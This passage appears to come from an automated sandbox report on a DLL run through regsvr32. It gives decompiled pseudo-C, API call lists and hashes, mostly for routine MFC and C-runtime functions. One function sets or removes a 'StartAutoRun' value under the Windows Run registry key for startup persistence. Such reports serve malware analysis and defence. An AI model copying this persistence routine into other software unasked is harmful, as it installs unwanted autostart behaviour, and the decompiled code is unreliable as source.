                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                • String ID: AfxOldWndProc423
                                                                                                                • API String ID: 2702501687-1060338832
                                                                                                                • Opcode ID: b3b26bc1989b91077657b4700a70c313c633de35d29dc9d8617e35590db8554f
                                                                                                                • Instruction ID: 6745bc68f29073eb744064efea3e3c24a42fec2ac1e681f38e254d8674a0d3fa
                                                                                                                • Opcode Fuzzy Hash: b3b26bc1989b91077657b4700a70c313c633de35d29dc9d8617e35590db8554f
                                                                                                                • Instruction Fuzzy Hash: 7331807680051AAFDF01DFE4DD89EBF3AB9EF09301F004115F601AB062DB35DA909BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10026AEE() {
                                                                                                                				struct HWND__* _v4;
                                                                                                                				void* _v68;
                                                                                                                				void* _v76;
                                                                                                                				int _t4;
                                                                                                                				int _t10;
                                                                                                                				struct HDC__* _t15;
                                                                                                                				void* _t18;
                                                                                                                
                                                                                                                				_t4 =  *0x1006d324; // 0xffffffff
                                                                                                                				if(_t4 == 0xffffffff) {
                                                                                                                					_t15 = GetDC(0);
                                                                                                                					_v4 = 0;
                                                                                                                					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                                                                                                                					if(_t18 != 0) {
                                                                                                                						_v68 = SelectObject(_t15, _t18);
                                                                                                                					}
                                                                                                                					GetCharWidthA(_t15, 0x36, 0x36, 0x1006d324);
                                                                                                                					if(_t18 != 0) {
                                                                                                                						SelectObject(_t15, _v76);
                                                                                                                						DeleteObject(_t18);
                                                                                                                					}
                                                                                                                					ReleaseDC(0, _t15);
                                                                                                                					_t10 =  *0x1006d324; // 0xffffffff
                                                                                                                					return _t10;
                                                                                                                				}
                                                                                                                				return _t4;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 10026B00
                                                                                                                • GetSystemMetrics.USER32 ref: 10026B24
                                                                                                                • CreateFontA.GDI32(00000000,?,?,?,?,?,10027C49,?,?,?,?,?,?,?), ref: 10026B2B
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 10026B3F
                                                                                                                • GetCharWidthA.GDI32(00000000,00000036,00000036,1006D324), ref: 10026B4F
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 10026B5E
                                                                                                                • DeleteObject.GDI32(00000000), ref: 10026B61
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 10026B69
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                                • String ID: Marlett
                                                                                                                • API String ID: 1397664628-3688754224
                                                                                                                • Opcode ID: 4c2ac4db1c1f23029f9fd7ee94168f935361a3d70fb4354e594fd1e23e8ef388
                                                                                                                • Instruction ID: 312bde09171b4c5a86fc007af76adbc0d65994d8a33d49adcc0c1b8b05bb4233
                                                                                                                • Opcode Fuzzy Hash: 4c2ac4db1c1f23029f9fd7ee94168f935361a3d70fb4354e594fd1e23e8ef388
                                                                                                                • Instruction Fuzzy Hash: 990175719422307BE3719B26AC8CD9F7EADEF4EBF1F400515F20992190C7254940C6B5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E100429EC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				struct HINSTANCE__* _t20;
                                                                                                                				intOrPtr _t24;
                                                                                                                				intOrPtr _t28;
                                                                                                                				intOrPtr _t39;
                                                                                                                				void* _t40;
                                                                                                                
                                                                                                                				_push(0xc);
                                                                                                                				_push(0x10068f80);
                                                                                                                				E1003D578(__ebx, __edi, __esi);
                                                                                                                				_t20 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                				 *(_t40 - 0x1c) = _t20;
                                                                                                                				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                                                				 *((intOrPtr*)(_t39 + 0x5c)) = 0x1006e988;
                                                                                                                				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                                                                                                				if(_t20 != 0) {
                                                                                                                					 *((intOrPtr*)(_t39 + 0x1f8)) = GetProcAddress(_t20, "EncodePointer");
                                                                                                                					 *((intOrPtr*)(_t39 + 0x1fc)) = GetProcAddress( *(_t40 - 0x1c), "DecodePointer");
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                                                                                                				 *((char*)(_t39 + 0xc8)) = 0x43;
                                                                                                                				 *((char*)(_t39 + 0x14b)) = 0x43;
                                                                                                                				 *(_t39 + 0x68) = 0x1006dfe0;
                                                                                                                				InterlockedIncrement(0x1006dfe0);
                                                                                                                				E1004329E(0xc);
                                                                                                                				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                                                                				_t24 =  *((intOrPtr*)(_t40 + 0xc));
                                                                                                                				 *((intOrPtr*)(_t39 + 0x6c)) = _t24;
                                                                                                                				if(_t24 == 0) {
                                                                                                                					_t28 =  *0x1006e5e8; // 0x1006e510
                                                                                                                					 *((intOrPtr*)(_t39 + 0x6c)) = _t28;
                                                                                                                				}
                                                                                                                				_push( *((intOrPtr*)(_t39 + 0x6c)));
                                                                                                                				E10044C34();
                                                                                                                				 *(_t40 - 4) = 0xfffffffe;
                                                                                                                				return E1003D5BD(E10042A97());
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10068F80,0000000C,10042AFE,00000000,00000000,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7), ref: 100429FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001,00000001,?,10042BBE), ref: 10042A26
                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001,00000001,?,10042BBE), ref: 10042A36
                                                                                                                • InterlockedIncrement.KERNEL32(1006DFE0), ref: 10042A58
                                                                                                                • __lock.LIBCMT ref: 10042A60
                                                                                                                • ___addlocaleref.LIBCMT ref: 10042A7F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 1036688887-2843748187
                                                                                                                • Opcode ID: c8ac78e0f49025fdcf952466aae8be47cf5ffca1bb4c7d7a7b32397d64ecb710
                                                                                                                • Instruction ID: 39933159fc6c4172093701dcbc24d09404a48d515a1d8b9df063bbdc0396ed4e
                                                                                                                • Opcode Fuzzy Hash: c8ac78e0f49025fdcf952466aae8be47cf5ffca1bb4c7d7a7b32397d64ecb710
                                                                                                                • Instruction Fuzzy Hash: 0C11A1B5900B419FE760DF79CC44B9ABBF0EF04304F50492AE99AD7260CB74AA41CF25
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100360D5(void* __ecx, int _a4) {
                                                                                                                				int _v8;
                                                                                                                				struct tagRECT _v24;
                                                                                                                				long _t39;
                                                                                                                				int _t42;
                                                                                                                				int _t43;
                                                                                                                				int _t62;
                                                                                                                				int _t66;
                                                                                                                				void* _t68;
                                                                                                                				long _t69;
                                                                                                                				int _t71;
                                                                                                                
                                                                                                                				_t69 = _a4;
                                                                                                                				_t68 = __ecx;
                                                                                                                				_t39 = DefWindowProcA( *(__ecx + 0x20), 0x46, 0, _t69);
                                                                                                                				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
                                                                                                                					GetWindowRect( *(_t68 + 0x20),  &_v24);
                                                                                                                					_t42 = _a4;
                                                                                                                					_t66 =  *(_t42 + 0x10);
                                                                                                                					_t71 = _v24.right - _v24.left;
                                                                                                                					_t62 = _v24.bottom - _v24.top;
                                                                                                                					_t43 =  *(_t42 + 0x14);
                                                                                                                					_v8 = _t66;
                                                                                                                					_a4 = _t43;
                                                                                                                					if(_t66 != _t71 && ( *(_t68 + 0x80) & 0x00000400) != 0) {
                                                                                                                						SetRect( &_v24, _t66 -  *0x10070c80, 0, _t66, _t43);
                                                                                                                						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                                                                                                                						SetRect( &_v24, _t71 -  *0x10070c80, 0, _t71, _a4);
                                                                                                                						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                                                                                                                						_t66 = _v8;
                                                                                                                						_t43 = _a4;
                                                                                                                					}
                                                                                                                					if(_t43 != _t62 && ( *(_t68 + 0x80) & 0x00000800) != 0) {
                                                                                                                						SetRect( &_v24, 0, _t43 -  *0x10070c84, _t66, _t43);
                                                                                                                						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                                                                                                                						SetRect( &_v24, 0, _t62 -  *0x10070c84, _v8, _t62);
                                                                                                                						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                                                                                                                					}
                                                                                                                					return _t43;
                                                                                                                				}
                                                                                                                				return _t39;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 100360EA
                                                                                                                • GetWindowRect.USER32 ref: 10036102
                                                                                                                • SetRect.USER32 ref: 10036141
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 10036150
                                                                                                                • SetRect.USER32 ref: 10036167
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 10036176
                                                                                                                • SetRect.USER32 ref: 100361A6
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 100361B1
                                                                                                                • SetRect.USER32 ref: 100361C8
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 100361D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Invalidate$Window$Proc
                                                                                                                • String ID:
                                                                                                                • API String ID: 570070710-0
                                                                                                                • Opcode ID: c66c87a2f9a5546e65306e23b650eeb7f5bf2d703e939f4f0808907c358abcdc
                                                                                                                • Instruction ID: bd618f862e839b5d7029390d9d1a8aa06711ed5474499157b0c9b14728c5a8f0
                                                                                                                • Opcode Fuzzy Hash: c66c87a2f9a5546e65306e23b650eeb7f5bf2d703e939f4f0808907c358abcdc
                                                                                                                • Instruction Fuzzy Hash: CC31FA72940519BFEB05CFA4CD88FAEBBB8FB08340F144215F905A75A0E770AA54CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E100149F0(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __ebp, void* __eflags) {
                                                                                                                				int _v4;
                                                                                                                				char _v12;
                                                                                                                				signed int _v16;
                                                                                                                				char _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				signed int _v28;
                                                                                                                				char _v44;
                                                                                                                				char _v48;
                                                                                                                				char _v228;
                                                                                                                				char _v304;
                                                                                                                				char _v312;
                                                                                                                				char _v316;
                                                                                                                				void* _v320;
                                                                                                                				void* _v324;
                                                                                                                				char* _v328;
                                                                                                                				char* _v332;
                                                                                                                				char _v348;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t55;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t61;
                                                                                                                				intOrPtr* _t64;
                                                                                                                				long _t74;
                                                                                                                				void* _t77;
                                                                                                                				signed int** _t79;
                                                                                                                				intOrPtr* _t80;
                                                                                                                				void* _t81;
                                                                                                                				signed int _t136;
                                                                                                                				signed int _t138;
                                                                                                                				intOrPtr _t142;
                                                                                                                				void* _t143;
                                                                                                                				char* _t144;
                                                                                                                				void* _t145;
                                                                                                                				intOrPtr* _t147;
                                                                                                                				void* _t148;
                                                                                                                				int _t151;
                                                                                                                				void* _t152;
                                                                                                                				signed int _t153;
                                                                                                                				signed int _t154;
                                                                                                                				intOrPtr* _t158;
                                                                                                                
                                                                                                                				_t156 = __eflags;
                                                                                                                				_t149 = __ebp;
                                                                                                                				_t131 = __edx;
                                                                                                                				_t100 = __ebx;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E1005280C);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t153 = _t152 - 0x130;
                                                                                                                				_t55 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v16 = _t55 ^ _t153;
                                                                                                                				_push(__ebp);
                                                                                                                				_push(_t143);
                                                                                                                				_t57 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t57 ^ _t153);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t147 = __ecx;
                                                                                                                				E100205E2( &_v304, __eflags);
                                                                                                                				_push(0);
                                                                                                                				_push(0x1001);
                                                                                                                				_push("Setting\\Setting.dat");
                                                                                                                				_v4 = 0;
                                                                                                                				_t61 = E10020A24( &_v304, __edx, _t156);
                                                                                                                				_t157 = _t61;
                                                                                                                				if(_t61 != 0) {
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_v316 + 0x28))))(0, 0, 0);
                                                                                                                					E10020058(__ebx,  &_v312,  *((intOrPtr*)(_v316 + 0x28)), _t143, _t147, _t157);
                                                                                                                					_t142 =  *_t147;
                                                                                                                					_t131 =  *((intOrPtr*)(_t142 + 8));
                                                                                                                					_v44 = 1;
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t142 + 8))))( &_v328,  &_v328, 0, 0x1000, 0);
                                                                                                                					E1001FEB3( &_v332, _t157);
                                                                                                                					E10020580(__ebx,  &_v348);
                                                                                                                					_v48 = 0;
                                                                                                                					E1002001A(__ebx,  &_v332,  *((intOrPtr*)(_t142 + 8)), _t143, _t147, _t157);
                                                                                                                				}
                                                                                                                				GetModuleFileNameA(0,  &_v228, 0xc8);
                                                                                                                				_t64 = E100173A6();
                                                                                                                				_t158 = _t64;
                                                                                                                				_t105 = 0 | _t158 == 0x00000000;
                                                                                                                				if(_t158 == 0) {
                                                                                                                					_t64 = E10001000(_t105, _t131, 0x80004005);
                                                                                                                				}
                                                                                                                				_v328 =  *((intOrPtr*)( *((intOrPtr*)( *_t64 + 0xc))))() + 0x10;
                                                                                                                				_v16 = 2;
                                                                                                                				E10003500( &_v328, 0x100585c0,  &_v228);
                                                                                                                				_t154 = _t153 + 0xc;
                                                                                                                				E10005030( &_v328, _t149, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
                                                                                                                				_v20 = 3;
                                                                                                                				RegCreateKeyA(0x80000002, _v328,  &_v324);
                                                                                                                				E1002B64F(_t100, _t147, _t147 + 0x154, _t143, _t149, _t147 + 0x154);
                                                                                                                				_t74 = SendMessageA( *(_t147 + 0x34c), 0xf0, 0, 0);
                                                                                                                				if(_t74 != 1) {
                                                                                                                					RegDeleteValueA(_v320, "StartAutoRun");
                                                                                                                					_t144 = _v328;
                                                                                                                				} else {
                                                                                                                					_t144 = _v328;
                                                                                                                					_t151 =  *(_t144 - 0xc);
                                                                                                                					if(( *(_t144 - 8) | _t74 -  *((intOrPtr*)(_t144 - 4))) < 0) {
                                                                                                                						_push(0);
                                                                                                                						E10001A40(_t100,  &_v328, _t144);
                                                                                                                						_t144 = _v332;
                                                                                                                					}
                                                                                                                					RegSetValueExA(_v320, "StartAutoRun", 0, 1, _t144, _t151);
                                                                                                                				}
                                                                                                                				_t136 =  *( *_t147 + 0x60);
                                                                                                                				_t77 =  *_t136();
                                                                                                                				_t162 = _t77 - 1;
                                                                                                                				if(_t77 != 1) {
                                                                                                                					E1002181C(_t100, _t144, _t147, _t162, 0x10059a60, 0, 0);
                                                                                                                				}
                                                                                                                				_t79 = _v324 + 0xfffffff0;
                                                                                                                				_v16 = 2;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t138 = (_t136 | 0xffffffff) - 1;
                                                                                                                				if(_t138 <= 0) {
                                                                                                                					_t138 =  *( *_t79);
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t138 + 4))))(_t79);
                                                                                                                				}
                                                                                                                				_t46 = _t144 - 0x10; // 0x7ffffff2
                                                                                                                				_t80 = _t46;
                                                                                                                				_v16 = 0;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t140 = (_t138 | 0xffffffff) - 1;
                                                                                                                				_t164 = (_t138 | 0xffffffff) - 1;
                                                                                                                				if((_t138 | 0xffffffff) - 1 <= 0) {
                                                                                                                					_t140 =  *((intOrPtr*)( *_t80));
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t80)) + 4))))(_t80);
                                                                                                                				}
                                                                                                                				_v16 = 0xffffffff;
                                                                                                                				_t81 = E100206EF(_t100,  &_v316, _t140, _t144, _t147, _t164);
                                                                                                                				 *[fs:0x0] = _v24;
                                                                                                                				_pop(_t145);
                                                                                                                				_pop(_t148);
                                                                                                                				return E1003B437(_t81, _t100, _v28 ^ _t154, _t140, _t145, _t148);
                                                                                                                			}

                                                                                                                0x10014bda
                                                                                                                0x10014be8
                                                                                                                0x10014bec
                                                                                                                0x10014bef
                                                                                                                0x10014bf3
                                                                                                                0x10014bf9
                                                                                                                0x10014bf9
                                                                                                                0x10014bfb
                                                                                                                0x10014bfb
                                                                                                                0x10014bfe
                                                                                                                0x10014c0c
                                                                                                                0x10014c10
                                                                                                                0x10014c11
                                                                                                                0x10014c13
                                                                                                                0x10014c17
                                                                                                                0x10014c1d
                                                                                                                0x10014c1d
                                                                                                                0x10014c23
                                                                                                                0x10014c2e
                                                                                                                0x10014c3a
                                                                                                                0x10014c42
                                                                                                                0x10014c43
                                                                                                                0x10014c59

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10020A24: lstrlenA.KERNEL32(?,?,?,00000000), ref: 10020A81
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,000000C8), ref: 10014AC8
                                                                                                                • RegCreateKeyA.ADVAPI32 ref: 10014B3C
                                                                                                                • SendMessageA.USER32 ref: 10014B60
                                                                                                                • RegSetValueExA.ADVAPI32(?,StartAutoRun,00000000,00000001,80000002,?), ref: 10014B9B
                                                                                                                  • Part of subcall function 10020058: __EH_prolog3.LIBCMT ref: 1002005F
                                                                                                                  • Part of subcall function 10020580: CloseHandle.KERNEL32(000000FF), ref: 1002058F
                                                                                                                  • Part of subcall function 10020580: GetLastError.KERNEL32(?,00000000,?,1002073F,00000010), ref: 100205B4
                                                                                                                  • Part of subcall function 1002001A: __EH_prolog3.LIBCMT ref: 10020021
                                                                                                                • RegDeleteValueA.ADVAPI32(?,StartAutoRun), ref: 10014BAD
                                                                                                                  • Part of subcall function 100206EF: __EH_prolog3_catch.LIBCMT ref: 1002070E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Value$CloseCreateDeleteErrorFileH_prolog3_catchHandleLastMessageModuleNameSendlstrlen
                                                                                                                • String ID: Setting\Setting.dat$Software\Microsoft\Windows\CurrentVersion\Run$StartAutoRun
                                                                                                                • API String ID: 4289712629-2829586130
                                                                                                                • Opcode ID: 56b2bb787a06b45600bf828ddd5e09ad9e0a278f48a5a13d5ae69a0177c20f41
                                                                                                                • Instruction ID: ccf439e5a121c42e3fe72ca45fff9ad8c9dfaaf31d5b8296b06331e40e596778
                                                                                                                • Opcode Fuzzy Hash: 56b2bb787a06b45600bf828ddd5e09ad9e0a278f48a5a13d5ae69a0177c20f41
                                                                                                                • Instruction Fuzzy Hash: 26617D352087419FE324CB24CC85F9AB7E5EF89310F104A1CF1999B2E1DB70E949CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E10021153(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t65;
                                                                                                                				signed int _t72;
                                                                                                                				signed int _t74;
                                                                                                                				struct HWND__* _t75;
                                                                                                                				signed int _t78;
                                                                                                                				signed int _t95;
                                                                                                                				intOrPtr* _t103;
                                                                                                                				signed int _t110;
                                                                                                                				void* _t124;
                                                                                                                				signed int _t129;
                                                                                                                				DLGTEMPLATE* _t130;
                                                                                                                				struct HWND__* _t131;
                                                                                                                				void* _t132;
                                                                                                                
                                                                                                                				_t128 = __esi;
                                                                                                                				_t124 = __edx;
                                                                                                                				_t104 = __ecx;
                                                                                                                				_push(0x3c);
                                                                                                                				E1003D219(E10053552, __ebx, __edi, __esi);
                                                                                                                				_t103 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
                                                                                                                				_t136 =  *(_t132 + 0x10);
                                                                                                                				if( *(_t132 + 0x10) == 0) {
                                                                                                                					 *(_t132 + 0x10) =  *(E10023187(__ecx, 0, __esi, _t136) + 0xc);
                                                                                                                				}
                                                                                                                				_t129 =  *(E10023187(_t103, 0, _t128, _t136) + 0x3c);
                                                                                                                				 *(_t132 - 0x28) = _t129;
                                                                                                                				 *(_t132 - 0x14) = 0;
                                                                                                                				 *(_t132 - 4) = 0;
                                                                                                                				E1001C7A2(_t103, _t104, 0, _t129, _t136, 0x10);
                                                                                                                				E1001C7A2(_t103, _t104, 0, _t129, _t136, 0x7c000);
                                                                                                                				if(_t129 == 0) {
                                                                                                                					_t130 =  *(_t132 + 8);
                                                                                                                					L7:
                                                                                                                					__eflags = _t130;
                                                                                                                					if(_t130 == 0) {
                                                                                                                						L4:
                                                                                                                						_t65 = 0;
                                                                                                                						L32:
                                                                                                                						return E1003D2BE(_t65);
                                                                                                                					}
                                                                                                                					E10001050(_t132 - 0x1c, _t124, E100173A6());
                                                                                                                					 *(_t132 - 4) = 1;
                                                                                                                					 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                                					__eflags = E100353FB(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
                                                                                                                					__eflags =  *0x10070cc4; // 0x0
                                                                                                                					_t72 = 0 | __eflags == 0x00000000;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L14:
                                                                                                                						__eflags = _t72;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							L17:
                                                                                                                							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
                                                                                                                							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
                                                                                                                							E1001B7F6(0, __eflags, _t103);
                                                                                                                							_t74 =  *(_t132 + 0xc);
                                                                                                                							__eflags = _t74;
                                                                                                                							if(_t74 != 0) {
                                                                                                                								_t75 =  *(_t74 + 0x20);
                                                                                                                							} else {
                                                                                                                								_t75 = 0;
                                                                                                                							}
                                                                                                                							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E10020C3C, 0);
                                                                                                                							E10001020( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                                							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
                                                                                                                							_t110 =  *(_t132 - 0x28);
                                                                                                                							__eflags = _t110;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
                                                                                                                								__eflags = _t131;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									 *((intOrPtr*)( *_t103 + 0x12c))(0);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t78 = E10019CBE(_t103, 0, __eflags);
                                                                                                                							__eflags = _t78;
                                                                                                                							if(_t78 == 0) {
                                                                                                                								 *((intOrPtr*)( *_t103 + 0x114))();
                                                                                                                							}
                                                                                                                							__eflags = _t131;
                                                                                                                							if(_t131 != 0) {
                                                                                                                								__eflags =  *(_t103 + 0x3c) & 0x00000010;
                                                                                                                								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
                                                                                                                									DestroyWindow(_t131);
                                                                                                                									_t131 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							__eflags =  *(_t132 - 0x14);
                                                                                                                							if( *(_t132 - 0x14) != 0) {
                                                                                                                								GlobalUnlock( *(_t132 - 0x14));
                                                                                                                								GlobalFree( *(_t132 - 0x14));
                                                                                                                							}
                                                                                                                							__eflags = _t131;
                                                                                                                							_t59 = _t131 != 0;
                                                                                                                							__eflags = _t59;
                                                                                                                							_t65 = 0 | _t59;
                                                                                                                							goto L32;
                                                                                                                						}
                                                                                                                						L15:
                                                                                                                						E100353C4(_t103, _t132 - 0x38, 0, _t132, _t130);
                                                                                                                						 *(_t132 - 4) = 2;
                                                                                                                						E10035322(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
                                                                                                                						 *(_t132 - 0x14) = E1003505A(_t132 - 0x38);
                                                                                                                						 *(_t132 - 4) = 1;
                                                                                                                						E1003504C(_t132 - 0x38);
                                                                                                                						__eflags =  *(_t132 - 0x14);
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_t130 = GlobalLock( *(_t132 - 0x14));
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					__eflags = _t72;
                                                                                                                					if(_t72 != 0) {
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                					__eflags = GetSystemMetrics(0x2a);
                                                                                                                					if(__eflags == 0) {
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					_t95 = E10004290(_t132 - 0x1c, "MS Shell Dlg");
                                                                                                                					__eflags = _t95;
                                                                                                                					_t72 = 0 | _t95 == 0x00000000;
                                                                                                                					__eflags = _t72;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					__eflags =  *((short*)(_t132 - 0x18)) - 8;
                                                                                                                					if( *((short*)(_t132 - 0x18)) == 8) {
                                                                                                                						 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                                					}
                                                                                                                					goto L14;
                                                                                                                				}
                                                                                                                				_push(_t132 - 0x48);
                                                                                                                				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
                                                                                                                					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				goto L4;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002115A
                                                                                                                • GetSystemMetrics.USER32 ref: 1002120B
                                                                                                                • GlobalLock.KERNEL32 ref: 10021274
